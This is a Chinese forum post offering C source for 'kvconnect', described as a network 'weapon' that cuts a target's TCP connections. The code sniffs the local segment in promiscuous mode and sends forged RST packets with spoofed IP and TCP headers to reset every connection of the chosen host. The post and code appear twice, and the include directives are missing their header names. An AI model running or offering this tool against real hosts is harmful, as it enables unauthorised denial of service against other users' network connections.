继续。
为表示感谢,帖一段你可能感兴趣的代码。
这是俗称网络七种武器之一比照妖镜更毒辣的断门刀的的范例代码。/* 用法:kvconnect IP,若被攻击IP位于同网段,则断开它与外界的所有tcp连接 */
/* 若为远程主机,则断开它与本网段的所有tcp连接。本工具可以用来对付大白天 */
/* 搜proxy的机器,前提是泥知道哪台机器在搜,且该机器位于同网段。 */
/* 原作: hp of bbs.gznet.edu.cn 整理: digger 编译环境: redhat 5.1 */ #include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include #define __FAVOR_BSD
#include #define IP_TCP 6
#define PACKET_SIZE 4096 struct pseudohdr // pseudo tcp header
{
u_long saddr;
u_long daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
}; struct ip_packet
{
struct iphdr ipheader;
struct tcphdr tcpheader;
}; u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i; for (i = 0;i < (length >> 1);i ++)
value += data[i]; if ((length & 1) == 1)
value += (data[i] << 8); value = (value & 65535) + (value >> 16); return(~value);
} void leave();
int fd_recv = -1, fd_send = -1;
struct ifreq ifr, ifr_old; main(int argc,char *argv[])
{
char device[] = "eth0";
u_char buf_recv[PACKET_SIZE];
struct ip_packet buf_send;
struct pseudohdr pseudoheader;
struct iphdr * ip;
struct tcphdr * tcp;
struct in_addr in;
u_long ips;
int i, j, k;
int from_len, datalen;
struct sockaddr from; struct sockaddr_in to; if (argc < 2) {
printf("usuage: %s sourceIP\n", argv[0]);
exit(1);
}
if ( ( ips = inet_addr(argv[1]) ) == -1 ) {
printf("bad ip address\n");
exit(-1);
} fd_recv = socket(AF_INET, SOCK_PACKET, htons(0x0003));
if (fd_recv < 0) { perror( "packet socket error"); exit(-1); }
strcpy(ifr.ifr_name, device);
if (ioctl(fd_recv, SIOCGIFFLAGS, &ifr) < 0 ) {
perror("ioctl SIOCGIFFLAGS error");
if (fd_recv >= 0) close(fd_recv);
exit(-1);
}
ifr_old = ifr;
ifr.ifr_flags |= IFF_PROMISC;
if (ioctl(fd_recv, SIOCSIFFLAGS, &ifr) < 0 ) {
perror("ioctl SIOCSIFFLAGS error");
if (fd_recv >= 0) close(fd_recv);
exit(-1);
}
signal(SIGINT, leave);
signal(SIGTERM, leave); AGAIN:
bzero(&from, sizeof(from));
from_len = sizeof(from);
datalen = recvfrom(fd_recv, (char *)buf_recv, 4096, 0,
&from, &from_len);
if (datalen < 0) {
perror("recvfrom error");
exit(-1);
}
if (strcmp(device, from.sa_data) != 0) goto AGAIN; /* not packet for ip protocol, discard */
if (buf_recv[12] != 0x08 && buf_recv[13] != 0x00) goto AGAIN; ip = (struct iphdr *)&buf_recv[14];
tcp = (struct tcphdr *)&buf_recv[34]; if (ip->protocol == IP_TCP) {
if (ip->saddr == ips) {
if ( (tcp->th_flags & TH_ACK ) == 0) goto AGAIN;
in.s_addr = ip->daddr;
printf("%s:%d to %s:%d listened, ", argv[1],
ntohs(tcp->th_sport), inet_ntoa(in),
ntohs(tcp->th_dport) );
if ( (fd_send = socket( AF_INET,
SOCK_RAW,IPPROTO_RAW)) == -1) {
perror("raw socket error");
exit(-1);
}
bzero((char *)&buf_send, sizeof(struct ip_packet));
/*FAKE TCP HEADER*/
buf_send.tcpheader.th_sport = tcp->th_dport;
buf_send.tcpheader.th_dport = tcp->th_sport;
buf_send.tcpheader.th_seq = tcp->th_ack;
buf_send.tcpheader.th_ack = tcp->th_seq;
buf_send.tcpheader.th_x2 = 0;
buf_send.tcpheader.th_off = 0x50;
buf_send.tcpheader.th_flags = TH_RST;
buf_send.tcpheader.th_win= htons(2048);
buf_send.tcpheader.th_sum= 0;
buf_send.tcpheader.th_urp= 0;
/*FAKE IP HEADER*/
buf_send.ipheader.version = 4;
buf_send.ipheader.ihl = 5;
buf_send.ipheader.tos = 0;
buf_send.ipheader.tot_len = htons(0x28);
buf_send.ipheader.id = 0x1234;
buf_send.ipheader.frag_off = 0;
buf_send.ipheader.ttl = 0xff;
buf_send.ipheader.protocol = IP_TCP;
buf_send.ipheader.check = 0;
buf_send.ipheader.saddr = ip->daddr;
buf_send.ipheader.daddr = ip->saddr;
/*TCP CHECK SUM*/
bzero(&pseudoheader, 12 + sizeof(struct tcphdr));
pseudoheader.saddr = ip->daddr;
pseudoheader.daddr = ip->saddr;
pseudoheader.protocol = 6;
pseudoheader.length = htons(sizeof(struct tcphdr));
bcopy( (char *) &buf_send.tcpheader,
(char *) &pseudoheader.tcpheader,
sizeof(struct tcphdr) );
buf_send.tcpheader.th_sum = checksum(
(u_short *) &pseudoheader,
12+sizeof(struct tcphdr) ); to.sin_family = AF_INET;
to.sin_addr.s_addr = ips;
k = sendto( fd_send, (char *)& buf_send, 40, 0,
(struct sockaddr *)&to,
sizeof(struct sockaddr) );
if (k < 0) {
perror("sendto error");
exit(-1);
}
printf("RST packet sent back ok.\n");
close(fd_send);
fd_send = -1;
}
}
goto AGAIN;
} void leave()
{
if (ioctl(fd_recv, SIOCSIFFLAGS, &ifr_old) < 0) {
perror("ioctl SIOCSIFFLAGS error");
}
if (fd_recv > 0) close(fd_recv);
if (fd_send > 0) close(fd_send);
printf("process terminamted.\n");
exit(0);
}
为表示感谢,帖一段你可能感兴趣的代码。
这是俗称网络七种武器之一比照妖镜更毒辣的断门刀的的范例代码。/* 用法:kvconnect IP,若被攻击IP位于同网段,则断开它与外界的所有tcp连接 */
/* 若为远程主机,则断开它与本网段的所有tcp连接。本工具可以用来对付大白天 */
/* 搜proxy的机器,前提是泥知道哪台机器在搜,且该机器位于同网段。 */
/* 原作: hp of bbs.gznet.edu.cn 整理: digger 编译环境: redhat 5.1 */ #include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include #define __FAVOR_BSD
#include #define IP_TCP 6
#define PACKET_SIZE 4096 struct pseudohdr // pseudo tcp header
{
u_long saddr;
u_long daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
}; struct ip_packet
{
struct iphdr ipheader;
struct tcphdr tcpheader;
}; u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i; for (i = 0;i < (length >> 1);i ++)
value += data[i]; if ((length & 1) == 1)
value += (data[i] << 8); value = (value & 65535) + (value >> 16); return(~value);
} void leave();
int fd_recv = -1, fd_send = -1;
struct ifreq ifr, ifr_old; main(int argc,char *argv[])
{
char device[] = "eth0";
u_char buf_recv[PACKET_SIZE];
struct ip_packet buf_send;
struct pseudohdr pseudoheader;
struct iphdr * ip;
struct tcphdr * tcp;
struct in_addr in;
u_long ips;
int i, j, k;
int from_len, datalen;
struct sockaddr from; struct sockaddr_in to; if (argc < 2) {
printf("usuage: %s sourceIP\n", argv[0]);
exit(1);
}
if ( ( ips = inet_addr(argv[1]) ) == -1 ) {
printf("bad ip address\n");
exit(-1);
} fd_recv = socket(AF_INET, SOCK_PACKET, htons(0x0003));
if (fd_recv < 0) { perror( "packet socket error"); exit(-1); }
strcpy(ifr.ifr_name, device);
if (ioctl(fd_recv, SIOCGIFFLAGS, &ifr) < 0 ) {
perror("ioctl SIOCGIFFLAGS error");
if (fd_recv >= 0) close(fd_recv);
exit(-1);
}
ifr_old = ifr;
ifr.ifr_flags |= IFF_PROMISC;
if (ioctl(fd_recv, SIOCSIFFLAGS, &ifr) < 0 ) {
perror("ioctl SIOCSIFFLAGS error");
if (fd_recv >= 0) close(fd_recv);
exit(-1);
}
signal(SIGINT, leave);
signal(SIGTERM, leave); AGAIN:
bzero(&from, sizeof(from));
from_len = sizeof(from);
datalen = recvfrom(fd_recv, (char *)buf_recv, 4096, 0,
&from, &from_len);
if (datalen < 0) {
perror("recvfrom error");
exit(-1);
}
if (strcmp(device, from.sa_data) != 0) goto AGAIN; /* not packet for ip protocol, discard */
if (buf_recv[12] != 0x08 && buf_recv[13] != 0x00) goto AGAIN; ip = (struct iphdr *)&buf_recv[14];
tcp = (struct tcphdr *)&buf_recv[34]; if (ip->protocol == IP_TCP) {
if (ip->saddr == ips) {
if ( (tcp->th_flags & TH_ACK ) == 0) goto AGAIN;
in.s_addr = ip->daddr;
printf("%s:%d to %s:%d listened, ", argv[1],
ntohs(tcp->th_sport), inet_ntoa(in),
ntohs(tcp->th_dport) );
if ( (fd_send = socket( AF_INET,
SOCK_RAW,IPPROTO_RAW)) == -1) {
perror("raw socket error");
exit(-1);
}
bzero((char *)&buf_send, sizeof(struct ip_packet));
/*FAKE TCP HEADER*/
buf_send.tcpheader.th_sport = tcp->th_dport;
buf_send.tcpheader.th_dport = tcp->th_sport;
buf_send.tcpheader.th_seq = tcp->th_ack;
buf_send.tcpheader.th_ack = tcp->th_seq;
buf_send.tcpheader.th_x2 = 0;
buf_send.tcpheader.th_off = 0x50;
buf_send.tcpheader.th_flags = TH_RST;
buf_send.tcpheader.th_win= htons(2048);
buf_send.tcpheader.th_sum= 0;
buf_send.tcpheader.th_urp= 0;
/*FAKE IP HEADER*/
buf_send.ipheader.version = 4;
buf_send.ipheader.ihl = 5;
buf_send.ipheader.tos = 0;
buf_send.ipheader.tot_len = htons(0x28);
buf_send.ipheader.id = 0x1234;
buf_send.ipheader.frag_off = 0;
buf_send.ipheader.ttl = 0xff;
buf_send.ipheader.protocol = IP_TCP;
buf_send.ipheader.check = 0;
buf_send.ipheader.saddr = ip->daddr;
buf_send.ipheader.daddr = ip->saddr;
/*TCP CHECK SUM*/
bzero(&pseudoheader, 12 + sizeof(struct tcphdr));
pseudoheader.saddr = ip->daddr;
pseudoheader.daddr = ip->saddr;
pseudoheader.protocol = 6;
pseudoheader.length = htons(sizeof(struct tcphdr));
bcopy( (char *) &buf_send.tcpheader,
(char *) &pseudoheader.tcpheader,
sizeof(struct tcphdr) );
buf_send.tcpheader.th_sum = checksum(
(u_short *) &pseudoheader,
12+sizeof(struct tcphdr) ); to.sin_family = AF_INET;
to.sin_addr.s_addr = ips;
k = sendto( fd_send, (char *)& buf_send, 40, 0,
(struct sockaddr *)&to,
sizeof(struct sockaddr) );
if (k < 0) {
perror("sendto error");
exit(-1);
}
printf("RST packet sent back ok.\n");
close(fd_send);
fd_send = -1;
}
}
goto AGAIN;
} void leave()
{
if (ioctl(fd_recv, SIOCSIFFLAGS, &ifr_old) < 0) {
perror("ioctl SIOCSIFFLAGS error");
}
if (fd_recv > 0) close(fd_recv);
if (fd_send > 0) close(fd_send);
printf("process terminamted.\n");
exit(0);
}
解决方案 »
免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货